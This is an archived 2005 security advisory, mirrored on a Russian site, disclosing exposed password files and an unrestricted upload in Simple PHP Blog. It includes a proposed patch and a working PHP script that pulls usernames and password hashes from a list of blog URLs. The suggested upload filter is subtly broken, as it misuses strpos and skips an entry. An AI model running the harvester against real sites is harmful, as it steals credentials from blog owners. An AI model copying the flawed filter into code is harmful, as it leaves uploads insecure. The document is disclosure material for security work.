The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Simple PHP Blog File Upload and User Credentials Exposure Vulnerabilities


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Thu, 25 Aug 2005 22:27:27 -0400
From: Scott Dewey <wr0ck@xorcrew.net.>
To: [email protected], [email protected]
Subject: Simple PHP Blog File Upload and User Credentials Exposure Vulnerabilities
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - atlantis.netboxplus.com
X-AntiAbuse: Original Domain - securityfocus.com
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [26 6]
X-AntiAbuse: Sender Address Domain - xorcrew.net
X-Source: 
X-Source-Args: 
X-Source-Dir: 
X-Virus-Scanned: antivirus-gw at tyumen.ru


XOR Crew :: Security Advisory 8/25/2005
Simple PHP Blog File Upload and User Credentials Exposure Vulnerabilities
http://www.xorcrew.net/
:: Summary Vendor : Alexander Palmo Vendor Site : http://www.simplephpblog.com/ Product(s) : Simple PHP Blog (SPHPBlog) Version(s) : All Severity : Medium/High Release Date : 8/25/2005 Impact : Unauthorized file upload, : Exposure of user credentials. Credits : ReZEN (rezen (a) xorcrew (.) net), : 0xception (oxception (a) xorcrew (.) net).
I. Description Simple PHP Blog is PHP (4 or greater) based blogging application that was written with simplicity of installation and maintenance in mind. Unlike other blog software, there is almost no setup - just unzip and copy. It is a dead-simple blog that doesn't require a database. It uses flat text files, and looks nice.
II. Synopsis The Simple PHP Blog application has two vulnerabilities present within it that when used together, can allow an attacker to arbitrarily upload files to the server. The first vulnerability has to do with insecure default file permissions and placement of config.txt and password.txt, and leaves both files fully accessible to unauthorized users. This problem was realized earlier in February, unknown to us. The fix for that is to simply `.htaccess' the config directory of the blogger's directory tree. The second of the two vulnerabilities lies within the image upload system provided to (il?)legitimate, logged-in users. There is no image validation function in the blogger to stop an unauthorized user from uploading any file they want to to the server. The vendor has been contacted and has failed to reply. This is a problem that has yet to be addressed.
III. Code/PoC Insecure file upload - fix by ReZEN: Add to upload_img_cgi.php at line 19: -----BEGIN----- $no = array( "exe", "pl", "php", "php3", "php4", "php5", "phps", "asp", "cgi", "html", "htm" ); for( $i = 0; $i < 10; $i++ ) { if( strpos( $uploadfile, $no[$i] ) >= 0 ) { echo "That filetype is not allowed"; exit; } } ------END------ PoC code to harvest usernames and passwords from vulnerable blogs, given a list of URLs: -----BEGIN----- <?php /******************************************** Stupid Script to grab usernames and password hashes form Simple PHP Blog Coded by ReZEN of XOR http://www.xorcrew.net/ReZEN ReZEN (AT) xorcrew (DOT) net Greetz: wr0ck, 0xception, tendo, ld, smirks, ajax, gml(i miss you), Infintiy, my friends My loving parents =] and anyone else i forgot *********************************************/ $pdir = "config/password.txt"; $udir = "config/config.txt"; $urllist = "urls.txt"; //List of Blog Urls $i = 0; $fp = fopen( $urllist, 'rb' ); if( !$fp ) { echo "Unable to open: ".$urllist."<br><br>"; } else { while ( !feof ( $fp ) ) { $url[$i] = fgets ( $fp, 1000 ); $url[$i] = trim( $url[$i] ); $i = $i + 1; } $limit = $i; fclose( $fp ); } for( $i = 0; $i < $limit; $i++ ) { $fp = fopen( $url[$i].$pdir, 'rb' ); if ( !$fp ) { echo "Unable to get: ".$url.$pdir."<br><br>"; } else { $pass = fread($fp, 1000); fclose($fp); } $fp = fopen( $url[$i].$udir, 'rb' ); if (!$fp) { echo "Unable to get: ".$url.$udir."<br><br>"; } else { $conf = fread( $fp, 1000 ); fclose( $fp ); } $user = explode( "|", $conf ); echo $user[1].":".$pass."<br>"; $user = ""; $pass = ""; } ?> ------END------
IV. Greets :> All of xor, Infinity, stokhli, ajax, gml, k&k, seeprompt, the rest.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру